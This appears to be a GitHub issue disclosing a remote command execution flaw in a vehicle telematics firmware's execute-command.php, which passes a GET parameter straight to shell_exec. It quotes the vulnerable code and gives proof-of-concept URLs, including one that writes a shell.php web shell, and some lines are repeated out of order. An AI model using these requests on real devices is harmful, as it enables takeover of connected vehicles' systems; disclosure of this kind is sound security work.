/execute-command.php?command=echo "" > shell.php
To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.
The text was updated successfully, but these errors were encountered:
The execute-command.php file exists in the \www\pages\matrix-gui-2.0 directory of the firmware
Vulnerability type: command execution
This source code is used for the tbox in the Internet of Vehicles, which can control the car's brain, so it is very dangerous


`<?php
$command = $_GET['command'];
$output = shell_exec($command);
echo $output;
?>
`
Through shell_ Exec carries out command execution, and the execution content is controlled by the command of get parameter transfer
Vulnerability exploitation process:
Pass the parameter command to the shell through get_ Exec for command execution and final output
POC:
/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php
Example:

http://192.168.160.128:7777/execute-command.php?command=ls
/execute-command.php?command=echo "" > shell.php


To sum up, the device has a remote command execution vulnerability, which can be performed by injecting malicious code to obtain server permissions.
The text was updated successfully, but these errors were encountered: